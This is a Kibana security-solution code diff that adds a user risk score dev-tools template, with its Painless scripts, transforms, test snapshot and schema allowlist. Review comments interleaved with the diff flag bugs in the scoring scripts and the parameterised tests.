"@timestamp", + "_id" + ], + "method": "SHA-256", + "target_field": "_id" + } + }, + { + "script": { + "id": "ml_userriskscore_levels_script", + "params": { + "risk_score": "risk_stats.risk_score" + } + } + } + ] +} + +# 5. 
Create mappings for the destination index of the User Risk Score pivot transform +PUT ml_user_risk_score_{{space_name}} +{ + "mappings":{ + "properties":{ + "user.name":{ + "type":"keyword" + }, + "@timestamp": { + "type": "date" + }, + "ingest_timestamp": { + "type": "date" + }, + "risk": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + }, + "risk_stats": { + "properties": { + "risk_score": { + "type": "float" + } + } + } + } + } +} + +# 6. Upload the User Risk Score pivot transform +# This transform runs hourly and calculates a risk score and risk level for users in a Kibana space +PUT _transform/ml_userriskscore_pivot_transform_{{space_name}} +{ + "dest": { + "index": "ml_user_risk_score_{{space_name}}", + "pipeline": "ml_userriskscore_ingest_pipeline" + }, + "frequency": "1h", + "pivot": { + "aggregations": { + "@timestamp": { + "max": { + "field": "@timestamp" + } + }, + "risk_stats": { + "scripted_metric": { + "combine_script": "return state", + "init_script": "state.rule_risk_stats = new HashMap();", + "map_script": { + "id": "ml_userriskscore_map_script" + }, + "params": { + "max_risk": 100, + "p": 1.5, + "zeta_constant": 2.612 + }, + "reduce_script": { + "id": "ml_userriskscore_reduce_script" + } + } + } + }, + "group_by": { + "user.name": { + "terms": { + "field": "user.name" + } + } + } + }, + "source": { + "index": [ + ".alerts-security.alerts-{{space_name}}" + ], + "query": { + "bool": { + "filter": [ + { + "range": { + "@timestamp": { + "gte": "now-90d" + } + } + }, + { + "match": { + "signal.status": "open" + } + } + ] + } + } + }, + "sync": { + "time": { + "delay": "120s", + "field": "@timestamp" + } + } +} + +# 7. start the pivot transform +POST _transform/ml_userriskscore_pivot_transform_{{space_name}}/_start + +# 8. 
Create mappings for the destination index of the User Risk Score latest transform +PUT ml_user_risk_score_latest_{{space_name}} +{ + "mappings":{ + "properties":{ + "user.name":{ + "type":"keyword" + }, + "@timestamp": { + "type": "date" + }, + "ingest_timestamp": { + "type": "date" + }, + "risk": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + }, + "risk_stats": { + "properties": { + "risk_score": { + "type": "float" + } + } + } + } + } +} + +# 9. Upload the latest transform +# This transform gets the latest risk information about users in a Kibana space +PUT _transform/ml_userriskscore_latest_transform_{{space_name}} +{ + "dest": { + "index": "ml_user_risk_score_latest_{{space_name}}" + }, + "frequency": "1h", + "latest": { + "sort": "@timestamp", + "unique_key": [ + "user.name" + ] + }, + "source": { + "index": [ + "ml_user_risk_score_{{space_name}}" + ] + }, + "sync": { + "time": { + "delay": "2s", + "field": "ingest_timestamp" + } + } +} + +# 10. Start the latest transform +POST _transform/ml_userriskscore_latest_transform_{{space_name}}/_start + +# Hint: If you don't see data after running any of the transforms, stop and restart the transforms +# Stop the pivot transform +POST _transform/ml_userriskscore_pivot_transform_{{space_name}}/_stop + +# Start the pivot transform +POST _transform/ml_userriskscore_pivot_transform_{{space_name}}/_start + +# Stop the latest transform +POST _transform/ml_userriskscore_latest_transform_{{space_name}}/_stop + +# Start the latest transform +POST _transform/ml_userriskscore_latest_transform_{{space_name}}/_start diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/routes/__snapshots__/read_prebuilt_dev_tool_content_route.test.ts.snap b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/routes/__snapshots__/read_prebuilt_dev_tool_content_route.test.ts.snap index 1cb33ff1b15e4..9a81a32f80eed 100644 
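Review bot: In the map script at step 2, `def stats = state.rule_risk_stats.getOrDefault(rule_name, 0.0); stats = doc["signal.rule.risk_score"].value;` discards the value fetched from the state, so when several open alerts of the same rule land on one shard the last one wins, although the comment above it says "running sum"; the reduce script at step 3 does the same with `def stats = total_risk_stats.getOrDefault(key, 0.0); stats = rule_stats;`, so a rule present on several shards keeps whichever shard was iterated last. If the intent matches the host scripts this template was derived from, which take the maximum per rule (see the removed `Math.max` lines in the snapshot hunk below), the two assignments would read `stats = Math.max(stats, doc["signal.rule.risk_score"].value);` and `stats = Math.max(stats, rule_stats);`, and the comments should say "maximum" rather than "running sum" and "time decayed". The map script's source also opens with stray backslashes (`shard\\\\\n`) inside its leading comment and puts `"lang"` and `"source"` on one line, unlike the other three scripts in the file.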
--- a/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/routes/__snapshots__/read_prebuilt_dev_tool_content_route.test.ts.snap +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/routes/__snapshots__/read_prebuilt_dev_tool_content_route.test.ts.snap 
@@ -1,47 +1,37 @@ // Jest Snapshot v1, https://goo.gl/fbAQLP -exports[`readPrebuiltDevToolContentRoute should read content from enable_host_risk_score template 1`] = ` +exports[`readPrebuiltDevToolContentRoute should read content from "enable_host_risk_score" template 1`] = ` "# Click the run button of each step to enable the module # Upload scripts # 1. Script to assign risk level based on risk score -PUT _scripts/ml_hostriskscore_levels_script +PUT _scripts/ml_userriskscore_levels_script { \\"script\\": { \\"lang\\": \\"painless\\", - \\"source\\": \\"double risk_score = (def)ctx.getByPath(params.risk_score);\\\\nif (risk_score < 20) {\\\\n ctx['risk'] = 'Unknown'\\\\n}\\\\nelse if (risk_score >= 20 && risk_score < 40) {\\\\n ctx['risk'] = 'Low'\\\\n}\\\\nelse if (risk_score >= 40 && risk_score < 70) {\\\\n ctx['risk'] = 'Moderate'\\\\n}\\\\nelse if (risk_score >= 70 && risk_score < 90) {\\\\n ctx['risk'] = 'High'\\\\n}\\\\nelse if (risk_score >= 90) {\\\\n ctx['risk'] = 'Critical'\\\\n}\\" + \\"source\\": \\"double risk_score = (def)ctx.getByPath(params.risk_score);\\\\nif (risk_score < 20) {\\\\n ctx['risk'] = 'Unknown'\\\\n}\\\\nelse if (risk_score >= 20 && risk_score < 40) {\\\\n ctx['risk'] = 'Low'\\\\n}\\\\nelse if (risk_score >= 40 && risk_score < 70) {\\\\n ctx['risk'] = 'Moderate'\\\\n}\\\\nelse if (risk_score >= 70 && risk_score < 90) {\\\\n ctx['risk'] = 'High'\\\\n}\\\\nelse if (risk_score >= 90) {\\\\n ctx['risk'] = 'Critical'\\\\n}\\" } } -# 2. Map script for the Host Risk Score transform -PUT _scripts/ml_hostriskscore_map_script +# 2. 
Map script for the User Risk Score transform +PUT _scripts/ml_userriskscore_map_script { \\"script\\": { - \\"lang\\": \\"painless\\", - \\"source\\": \\"// Get the host variant\\\\nif (state.host_variant_set == false) {\\\\n if (doc.containsKey(\\\\\\"host.os.full\\\\\\") && doc[\\\\\\"host.os.full\\\\\\"].size() != 0) {\\\\n state.host_variant = doc[\\\\\\"host.os.full\\\\\\"].value;\\\\n state.host_variant_set = true;\\\\n }\\\\n}\\\\n// Aggregate all the tactics seen on the host\\\\nif (doc.containsKey(\\\\\\"signal.rule.threat.tactic.id\\\\\\") && doc[\\\\\\"signal.rule.threat.tactic.id\\\\\\"].size() != 0) {\\\\n state.tactic_ids.add(doc[\\\\\\"signal.rule.threat.tactic.id\\\\\\"].value);\\\\n}\\\\n// Get running sum of time-decayed risk score per rule name per shard\\\\nString rule_name = doc[\\\\\\"signal.rule.name\\\\\\"].value;\\\\ndef stats = state.rule_risk_stats.getOrDefault(rule_name, [0.0,\\\\\\"\\\\\\",false]);\\\\nint time_diff = (int)((System.currentTimeMillis() - doc[\\\\\\"@timestamp\\\\\\"].value.toInstant().toEpochMilli()) / (1000.0 * 60.0 * 60.0));\\\\ndouble risk_derate = Math.min(1, Math.exp((params.lookback_time - time_diff) / params.time_decay_constant));\\\\nstats[0] = Math.max(stats[0], doc[\\\\\\"signal.rule.risk_score\\\\\\"].value * risk_derate);\\\\nif (stats[2] == false) {\\\\n stats[1] = doc[\\\\\\"kibana.alert.rule.uuid\\\\\\"].value;\\\\n stats[2] = true;\\\\n}\\\\nstate.rule_risk_stats.put(rule_name, stats);\\" - } -} - -# 3. 
Reduce script for the Host Risk Score transform -PUT _scripts/ml_hostriskscore_reduce_script -{ - \\"script\\": { - \\"lang\\": \\"painless\\", - \\"source\\": \\"// Consolidating time decayed risks and tactics from across all shards\\\\nMap total_risk_stats = new HashMap();\\\\nString host_variant = new String();\\\\ndef tactic_ids = new HashSet();\\\\nfor (state in states) {\\\\n for (key in state.rule_risk_stats.keySet()) {\\\\n def rule_stats = state.rule_risk_stats.get(key);\\\\n def stats = total_risk_stats.getOrDefault(key, [0.0,\\\\\\"\\\\\\",false]);\\\\n stats[0] = Math.max(stats[0], rule_stats[0]);\\\\n if (stats[2] == false) {\\\\n stats[1] = rule_stats[1];\\\\n stats[2] = true;\\\\n } \\\\n total_risk_stats.put(key, stats);\\\\n }\\\\n if (host_variant.length() == 0) {\\\\n host_variant = state.host_variant;\\\\n }\\\\n tactic_ids.addAll(state.tactic_ids);\\\\n}\\\\n// Consolidating individual rule risks and arranging them in decreasing order\\\\nList risks = new ArrayList();\\\\nfor (key in total_risk_stats.keySet()) {\\\\n risks.add(total_risk_stats[key][0])\\\\n}\\\\nCollections.sort(risks, Collections.reverseOrder());\\\\n// Calculating total host risk score\\\\ndouble total_risk = 0.0;\\\\ndouble risk_cap = params.max_risk * params.zeta_constant;\\\\nfor (int i=0;i= 40 && total_norm_risk < 50) {\\\\n total_norm_risk = 85 + (total_norm_risk - 40);\\\\n}\\\\nelse {\\\\n total_norm_risk = 95 + (total_norm_risk - 50) / 10;\\\\n}\\\\n// Calculating multipliers to the host risk score\\\\ndouble risk_multiplier = 1.0;\\\\nList multipliers = new ArrayList();\\\\n// Add a multiplier if host is a server\\\\nif (host_variant.toLowerCase().contains(\\\\\\"server\\\\\\")) {\\\\n risk_multiplier *= params.server_multiplier;\\\\n multipliers.add(\\\\\\"Host is a server\\\\\\");\\\\n}\\\\n// Add multipliers based on number and diversity of tactics seen on the host\\\\nfor (String tactic : tactic_ids) {\\\\n multipliers.add(\\\\\\"Tactic \\\\\\"+tactic);\\\\n 
risk_multiplier *= 1 + params.tactic_base_multiplier * params.tactic_weights.getOrDefault(tactic, 0);\\\\n}\\\\n// Calculating final risk\\\\ndouble final_risk = total_norm_risk;\\\\nif (risk_multiplier > 1.0) {\\\\n double prior_odds = (total_norm_risk) / (100 - total_norm_risk);\\\\n double updated_odds = prior_odds * risk_multiplier; \\\\n final_risk = 100 * updated_odds / (1 + updated_odds);\\\\n}\\\\n// Adding additional metadata\\\\nList rule_stats = new ArrayList();\\\\nfor (key in total_risk_stats.keySet()) {\\\\n Map temp = new HashMap();\\\\n temp[\\\\\\"rule_name\\\\\\"] = key;\\\\n temp[\\\\\\"rule_risk\\\\\\"] = total_risk_stats[key][0];\\\\n temp[\\\\\\"rule_id\\\\\\"] = total_risk_stats[key][1];\\\\n rule_stats.add(temp);\\\\n}\\\\n\\\\nreturn [\\\\\\"risk_score\\\\\\": final_risk, \\\\\\"rule_risks\\\\\\": rule_stats, \\\\\\"risk_multipliers\\\\\\": multipliers];\\" + \\"lang\\": \\"painless\\", \\"source\\": \\"// Get running sum of risk score per rule name per shard\\\\\\\\\\\\\\\\\\\\nString rule_name = doc[\\\\\\"signal.rule.name\\\\\\"].value;\\\\ndef stats = state.rule_risk_stats.getOrDefault(rule_name, 0.0);\\\\nstats = doc[\\\\\\"signal.rule.risk_score\\\\\\"].value;\\\\nstate.rule_risk_stats.put(rule_name, stats);\\" } } -# 4. Script to setup initial state for the Host Risk Score scripted metric aggregation -PUT _scripts/ml_hostriskscore_init_script +# 3. 
Reduce script for the User Risk Score transform +PUT _scripts/ml_userriskscore_reduce_script { \\"script\\": { \\"lang\\": \\"painless\\", - \\"source\\": \\"state.rule_risk_stats = new HashMap();\\\\nstate.host_variant_set = false;\\\\nstate.host_variant = new String();\\\\nstate.tactic_ids = new HashSet();\\" + \\"source\\": \\"// Consolidating time decayed risks from across all shards\\\\nMap total_risk_stats = new HashMap();\\\\nfor (state in states) {\\\\n for (key in state.rule_risk_stats.keySet()) {\\\\n def rule_stats = state.rule_risk_stats.get(key);\\\\n def stats = total_risk_stats.getOrDefault(key, 0.0);\\\\n stats = rule_stats;\\\\n total_risk_stats.put(key, stats);\\\\n }\\\\n}\\\\n// Consolidating individual rule risks and arranging them in decreasing order\\\\nList risks = new ArrayList();\\\\nfor (key in total_risk_stats.keySet()) {\\\\n risks.add(total_risk_stats[key])\\\\n}\\\\nCollections.sort(risks, Collections.reverseOrder());\\\\n// Calculating total risk and normalizing it to a range\\\\ndouble total_risk = 0.0;\\\\ndouble risk_cap = params.max_risk * params.zeta_constant;\\\\nfor (int i=0;i= 40 && total_norm_risk < 50) {\\\\n total_norm_risk = 85 + (total_norm_risk - 40);\\\\n}\\\\nelse {\\\\n total_norm_risk = 95 + (total_norm_risk - 50) / 10;\\\\n}\\\\n\\\\nList rule_stats = new ArrayList();\\\\nfor (key in total_risk_stats.keySet()) {\\\\n Map temp = new HashMap();\\\\n temp[\\\\\\"rule_name\\\\\\"] = key;\\\\n temp[\\\\\\"rule_risk\\\\\\"] = total_risk_stats[key];\\\\n rule_stats.add(temp);\\\\n}\\\\n\\\\nreturn [\\\\\\"risk_score\\\\\\": total_norm_risk, \\\\\\"rule_risks\\\\\\": rule_stats];\\" } } -# 5. Upload the ingest pipeline +# 4. Upload ingest pipeline # Ingest pipeline to add ingest timestamp and risk level to documents -PUT _ingest/pipeline/ml_hostriskscore_ingest_pipeline +PUT _ingest/pipeline/ml_userriskscore_ingest_pipeline { \\"processors\\": [ { 
@@ -62,7 +52,7 @@ PUT _ingest/pipeline/ml_hostriskscore_ingest_pipeline }, { \\"script\\": { - \\"id\\": \\"ml_hostriskscore_levels_script\\", + \\"id\\": \\"ml_userriskscore_levels_script\\", \\"params\\": { \\"risk_score\\": \\"risk_stats.risk_score\\" } @@ -71,12 +61,12 @@ PUT _ingest/pipeline/ml_hostriskscore_ingest_pipeline ] } -# 6. Create mappings for the destination index of the Host Risk Score pivot transform -PUT ml_host_risk_score_default +# 5. Create mappings for the destination index of the User Risk Score pivot transform +PUT ml_user_risk_score_default { \\"mappings\\":{ \\"properties\\":{ - \\"host.name\\":{ + \\"user.name\\":{ \\"type\\":\\"keyword\\" }, \\"@timestamp\\": { @@ -104,13 +94,13 @@ PUT ml_host_risk_score_default } } -# 7. Upload the Host Risk Score pivot transform -# This transform runs hourly and calculates a risk score and risk level for hosts in a Kibana space -PUT _transform/ml_hostriskscore_pivot_transform_default +# 6. Upload the User Risk Score pivot transform +# This transform runs hourly and calculates a risk score and risk level for users in a Kibana space +PUT _transform/ml_userriskscore_pivot_transform_default { \\"dest\\": { - \\"index\\": \\"ml_host_risk_score_default\\", - \\"pipeline\\": \\"ml_hostriskscore_ingest_pipeline\\" + \\"index\\": \\"ml_user_risk_score_default\\", + \\"pipeline\\": \\"ml_userriskscore_ingest_pipeline\\" }, \\"frequency\\": \\"1h\\", \\"pivot\\": { 
@@ -123,47 +113,25 @@ PUT _transform/ml_hostriskscore_pivot_transform_default \\"risk_stats\\": { \\"scripted_metric\\": { \\"combine_script\\": \\"return state\\", - \\"init_script\\": { - \\"id\\": \\"ml_hostriskscore_init_script\\" - }, + \\"init_script\\": \\"state.rule_risk_stats = new HashMap();\\", \\"map_script\\": { - \\"id\\": \\"ml_hostriskscore_map_script\\" + \\"id\\": \\"ml_userriskscore_map_script\\" }, \\"params\\": { - \\"lookback_time\\": 72, \\"max_risk\\": 100, \\"p\\": 1.5, - \\"server_multiplier\\": 1.5, - \\"tactic_base_multiplier\\": 0.25, - \\"tactic_weights\\": { - \\"TA0001\\": 1, - \\"TA0002\\": 2, - \\"TA0003\\": 3, - \\"TA0004\\": 4, - \\"TA0005\\": 4, - \\"TA0006\\": 4, - \\"TA0007\\": 4, - \\"TA0008\\": 5, - \\"TA0009\\": 6, - \\"TA0010\\": 7, - \\"TA0011\\": 6, - \\"TA0040\\": 8, - \\"TA0042\\": 1, - \\"TA0043\\": 1 - }, - \\"time_decay_constant\\": 6, \\"zeta_constant\\": 2.612 }, \\"reduce_script\\": { - \\"id\\": \\"ml_hostriskscore_reduce_script\\" + \\"id\\": \\"ml_userriskscore_reduce_script\\" } } } }, \\"group_by\\": { - \\"host.name\\": { + \\"user.name\\": { \\"terms\\": { - \\"field\\": \\"host.name\\" + \\"field\\": \\"user.name\\" } } } @@ -178,9 +146,14 @@ PUT _transform/ml_hostriskscore_pivot_transform_default { \\"range\\": { \\"@timestamp\\": { - \\"gte\\": \\"now-5d\\" + \\"gte\\": \\"now-90d\\" } } + }, + { + \\"match\\": { + \\"signal.status\\": \\"open\\" + } } ] } 
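Review bot: The new `signal.status` filter in the `@@ -178,9 +146,14 @@` hunk uses a `match` query, which runs the value through the field's analyzer; for an exact status value on what is presumably a keyword field, `term` is the conventional filter and behaves the same regardless of mapping, so I would write it as `"term": { "signal.status": "open" }`. Two things worth confirming alongside it: widening the window from `now-5d` to `now-90d` means a single open alert now contributes to a user's score for three months until someone closes it, and the snapshot added later in this PR references `kibana.alert.*` fields, so if the target stack stores alert status under `kibana.alert.workflow_status` rather than `signal.status` this filter would silently match nothing and the transform would produce no scores. The enclosing transform definition starts and ends outside this hunk.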
@@ -194,16 +167,15 @@ PUT _transform/ml_hostriskscore_pivot_transform_default } } +# 7. start the pivot transform +POST _transform/ml_userriskscore_pivot_transform_default/_start -# 8. Start the pivot transform -POST _transform/ml_hostriskscore_pivot_transform_default/_start - -# 9. Create mappings for the destination index of the Host Risk Score latest transform -PUT ml_host_risk_score_latest_default +# 8. Create mappings for the destination index of the User Risk Score latest transform +PUT ml_user_risk_score_latest_default { \\"mappings\\":{ \\"properties\\":{ - \\"host.name\\":{ + \\"user.name\\":{ \\"type\\":\\"keyword\\" }, \\"@timestamp\\": { @@ -231,23 +203,23 @@ PUT ml_host_risk_score_latest_default } } -# 10. Upload the latest transform -# This transform gets the latest risk information about hosts in a Kibana space -PUT _transform/ml_hostriskscore_latest_transform_default +# 9. Upload the latest transform +# This transform gets the latest risk information about users in a Kibana space +PUT _transform/ml_userriskscore_latest_transform_default { \\"dest\\": { - \\"index\\": \\"ml_host_risk_score_latest_default\\" + \\"index\\": \\"ml_user_risk_score_latest_default\\" }, \\"frequency\\": \\"1h\\", \\"latest\\": { \\"sort\\": \\"@timestamp\\", \\"unique_key\\": [ - \\"host.name\\" + \\"user.name\\" ] }, \\"source\\": { \\"index\\": [ - \\"ml_host_risk_score_default\\" + \\"ml_user_risk_score_default\\" ] }, \\"sync\\": { 
@@ -258,20 +230,20 @@ PUT _transform/ml_hostriskscore_latest_transform_default } } -# 11. Start the latest transform -POST _transform/ml_hostriskscore_latest_transform_default/_start +# 10. Start the latest transform +POST _transform/ml_userriskscore_latest_transform_default/_start # Hint: If you don't see data after running any of the transforms, stop and restart the transforms # Stop the pivot transform -POST _transform/ml_hostriskscore_pivot_transform_default/_stop +POST _transform/ml_userriskscore_pivot_transform_default/_stop # Start the pivot transform -POST _transform/ml_hostriskscore_pivot_transform_default/_start +POST _transform/ml_userriskscore_pivot_transform_default/_start # Stop the latest transform -POST _transform/ml_hostriskscore_latest_transform_default/_stop +POST _transform/ml_userriskscore_latest_transform_default/_stop # Start the latest transform -POST _transform/ml_hostriskscore_latest_transform_default/_start +POST _transform/ml_userriskscore_latest_transform_default/_start " `; diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/routes/read_prebuilt_dev_tool_content_route.test.ts b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/routes/read_prebuilt_dev_tool_content_route.test.ts index cef23b1b1d5f6..1a3f5455f18ff 100644 --- a/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/routes/read_prebuilt_dev_tool_content_route.test.ts +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/routes/read_prebuilt_dev_tool_content_route.test.ts 
@@ -34,13 +34,16 @@ describe('readPrebuiltDevToolContentRoute', () => { readPrebuiltDevToolContentRoute(server.router); }); - test('should read content from enable_host_risk_score template', async () => { - const response = await server.inject( - readPrebuiltDevToolContentRequest('enable_host_risk_score'), - requestContextMock.convertContext(context) - ); - - expect(response.status).toEqual(200); - expect(response.body).toMatchSnapshot(); - }); + it.each([['enable_host_risk_score', 'enable_user_risk_score']])( + 'should read content from %p template', + async () => { + const response = await server.inject( + readPrebuiltDevToolContentRequest('enable_user_risk_score'), + requestContextMock.convertContext(context) + ); + + expect(response.status).toEqual(200); + expect(response.body).toMatchSnapshot(); + } + ); }); diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/schema.test.ts b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/schema.test.ts index 278b518c0c161..13b318158aac3 100644 --- a/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/schema.test.ts +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/schema.test.ts @@ -12,9 +12,12 @@ describe('ReadConsoleRequestSchema', () => { expect(() => ReadConsoleRequestSchema.params.validate({ console_id: '123' })).toThrow(); }); - it.each([['enable_host_risk_score']])('should allow console_id %p', async (template) => { - expect(ReadConsoleRequestSchema.params.validate({ console_id: template })).toEqual({ - console_id: template, - }); - }); + it.each([['enable_host_risk_score', 'enable_user_risk_score']])( + 'should allow console_id %p', + async (template) => { + expect(ReadConsoleRequestSchema.params.validate({ console_id: template })).toEqual({ + console_id: template, + }); + } + ); }); 
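Review bot: `it.each([['enable_host_risk_score', 'enable_user_risk_score']])` declares a single test case whose two strings become two positional arguments, not two cases, and the body then ignores them and hardcodes `readPrebuiltDevToolContentRequest('enable_user_risk_score')`, so the host template that the old test covered is no longer exercised at all and `%p` in the title only ever prints the first id. Split the ids into separate cases and feed the parameter through: `it.each([['enable_host_risk_score'], ['enable_user_risk_score']])(`, `async (template) => {`, and `readPrebuiltDevToolContentRequest(template),`. With two real cases the snapshot file will need two entries; after regenerating it, check that the two snapshots actually differ, which is the cheapest proof that the parameter is wired through.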
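Review bot: In the `ReadConsoleRequestSchema` test the table `[['enable_host_risk_score', 'enable_user_risk_score']]` yields one case in which `template` is `'enable_host_risk_score'` and the second id arrives as an unused extra argument, so `enable_user_risk_score` is never validated against the schema even though the test title suggests it is. Use one inner array per id: `it.each([['enable_host_risk_score'], ['enable_user_risk_score']])(`. Since this schema appears to be the allowlist that decides which template ids the route will accept, a negative case for a near miss such as `'enable_user_risk_score2'` next to the existing `'123'` check would guard against the `oneOf` being loosened later.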
diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/schema.ts b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/schema.ts index ed4f5fbcc93e9..cf01f0ef9f040 100644 --- a/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/schema.ts +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_dev_tool_content/schema.ts @@ -9,6 +9,9 @@ import { schema } from '@kbn/config-schema'; export const ReadConsoleRequestSchema = { params: schema.object({ - console_id: schema.oneOf([schema.literal('enable_host_risk_score')]), + console_id: schema.oneOf([ + schema.literal('enable_host_risk_score'), + schema.literal('enable_user_risk_score'), + ]), }), }; diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/mocks.ts b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/mocks.ts deleted file mode 100644 index 0f1616aa225fc..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/mocks.ts +++ /dev/null 
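Review bot: The `oneOf` of literals on `console_id` is presumably the allowlist that keeps a caller from naming anything other than a bundled template, but nothing in the file says so, and the growing list invites a future "simplification" to `schema.string()`. A one-line comment above `console_id` would make the intent explicit, for example `// Allowlist: console_id selects a bundled template, so only known ids are accepted — never a free-form string.` How the route uses the id is outside this hunk, so confirm it is really used as a lookup key before committing to that wording.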
@@ -1,414 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -export const expectedSavedObjectTemplate = [ - { - attributes: { - fieldAttrs: '{}', - fields: '[]', - runtimeFieldMap: '{}', - timeFieldName: '@timestamp', - title: 'ml_host_risk_score_default', - }, - coreMigrationVersion: '7.13.4', - id: 'ml-host-risk-score-default-index-pattern', - migrationVersion: { 'index-pattern': '7.11.0' }, - references: [], - type: 'index-pattern', - updated_at: '2021-08-18T18:37:41.486Z', - }, - { - attributes: { - description: null, - state: { - datasourceStates: { - indexpattern: { - layers: { - 'b885eaad-3c68-49ad-9891-70158d912dbd': { - columnOrder: [ - '8dcda7ec-1a1a-43b3-b0b8-e702943eed5c', - 'e82aed80-ee04-4ad1-9b9d-fde4a25be58a', - 'aa4ad9b2-8829-4517-aaa8-7ed7e5793e9b', - ], - columns: { - '8dcda7ec-1a1a-43b3-b0b8-e702943eed5c': { - customLabel: true, - dataType: 'string', - isBucketed: true, - label: 'Host Name', - operationType: 'terms', - params: { - missingBucket: false, - orderBy: { columnId: 'aa4ad9b2-8829-4517-aaa8-7ed7e5793e9b', type: 'column' }, - orderDirection: 'desc', - otherBucket: true, - size: 20, - }, - scale: 'ordinal', - sourceField: 'host.name', - }, - 'aa4ad9b2-8829-4517-aaa8-7ed7e5793e9b': { - customLabel: true, - dataType: 'number', - isBucketed: false, - label: 'Cumulative Risk Score', - operationType: 'max', - scale: 'ratio', - sourceField: 'risk_stats.risk_score', - }, - 'e82aed80-ee04-4ad1-9b9d-fde4a25be58a': { - dataType: 'date', - isBucketed: true, - label: '@timestamp', - operationType: 'date_histogram', - params: { interval: '1h' }, - scale: 'interval', - sourceField: '@timestamp', - }, - }, - incompleteColumns: {}, - }, - }, - }, - }, - filters: [], - query: { language: 'kuery', query: '' }, - visualization: { - layers: [ 
- { - accessors: ['aa4ad9b2-8829-4517-aaa8-7ed7e5793e9b'], - layerId: 'b885eaad-3c68-49ad-9891-70158d912dbd', - palette: { name: 'default', type: 'palette' }, - position: 'top', - seriesType: 'bar_stacked', - showGridlines: false, - splitAccessor: '8dcda7ec-1a1a-43b3-b0b8-e702943eed5c', - xAccessor: 'e82aed80-ee04-4ad1-9b9d-fde4a25be58a', - }, - ], - legend: { isVisible: true, position: 'right' }, - preferredSeriesType: 'bar_stacked', - title: 'Empty XY chart', - valueLabels: 'hide', - }, - }, - title: 'Host Risk Score (Max Risk Score Histogram)', - visualizationType: 'lnsXY', - }, - coreMigrationVersion: '7.13.4', - id: 'd3f72670-d3a0-11eb-bd37-7bb50422e346', - migrationVersion: { lens: '7.13.1' }, - references: [ - { - id: 'ml-host-risk-score-default-index-pattern', - name: 'indexpattern-datasource-current-indexpattern', - type: 'index-pattern', - }, - { - id: 'ml-host-risk-score-default-index-pattern', - name: 'indexpattern-datasource-layer-b885eaad-3c68-49ad-9891-70158d912dbd', - type: 'index-pattern', - }, - ], - type: 'lens', - updated_at: '2021-08-18T18:48:30.689Z', - }, - { - attributes: { - fieldAttrs: '{"signal.rule.type":{"count":1}}', - fields: '[]', - runtimeFieldMap: '{}', - timeFieldName: '@timestamp', - title: '.siem-signals-default', - }, - coreMigrationVersion: '7.13.4', - id: 'siem-signals-default-index-pattern', - migrationVersion: { 'index-pattern': '7.11.0' }, - references: [], - type: 'index-pattern', - updated_at: '2021-08-18T16:27:39.980Z', - }, - { - attributes: { - description: '', - kibanaSavedObjectMeta: { - searchSourceJSON: - '{"query":{"query":"","language":"kuery"},"filter":[],"indexRefName":"kibanaSavedObjectMeta.searchSourceJSON.index"}', - }, - title: 'Host Risk Score (Rule Breakdown)', - uiStateJSON: '{}', - version: 1, - visState: - '{"title":"Host Risk Score (Rule Breakdown)","type":"table","aggs":[{"id":"2","enabled":true,"type":"sum","params":{"field":"signal.rule.risk_score","customLabel":"Total Risk 
Score"},"schema":"metric"},{"id":"1","enabled":true,"type":"count","params":{"customLabel":"Number of Hits"},"schema":"metric"},{"id":"3","enabled":true,"type":"terms","params":{"field":"host.name","orderBy":"2","order":"desc","size":20,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Host"},"schema":"split"},{"id":"4","enabled":true,"type":"terms","params":{"field":"signal.rule.name","orderBy":"2","order":"desc","size":20,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Rule Name"},"schema":"bucket"},{"id":"5","enabled":true,"type":"terms","params":{"field":"signal.rule.type","orderBy":"2","order":"desc","size":20,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Rule Type"},"schema":"bucket"}],"params":{"perPage":10,"showPartialRows":false,"showMetricsAtAllLevels":false,"showTotal":false,"showToolbar":false,"totalFunc":"sum","percentageCol":"","row":true}}', - }, - coreMigrationVersion: '7.13.4', - id: '42371d00-cf7a-11eb-9a96-05d89f94ad96', - migrationVersion: { visualization: '7.13.1' }, - references: [ - { - id: 'siem-signals-default-index-pattern', - name: 'kibanaSavedObjectMeta.searchSourceJSON.index', - type: 'index-pattern', - }, - ], - type: 'visualization', - updated_at: '2021-08-18T16:27:39.980Z', - }, - { - attributes: { - description: '', - kibanaSavedObjectMeta: { - searchSourceJSON: - '{"query":{"query":"not user.name: *$","language":"kuery"},"filter":[],"indexRefName":"kibanaSavedObjectMeta.searchSourceJSON.index"}', - }, - title: 'Associated Users (Rule Breakdown)', - uiStateJSON: '{}', - version: 1, - visState: - '{"title":"Associated Users (Rule Breakdown)","type":"table","aggs":[{"id":"2","enabled":true,"type":"sum","params":{"field":"signal.rule.risk_score","customLabel":"Total Risk 
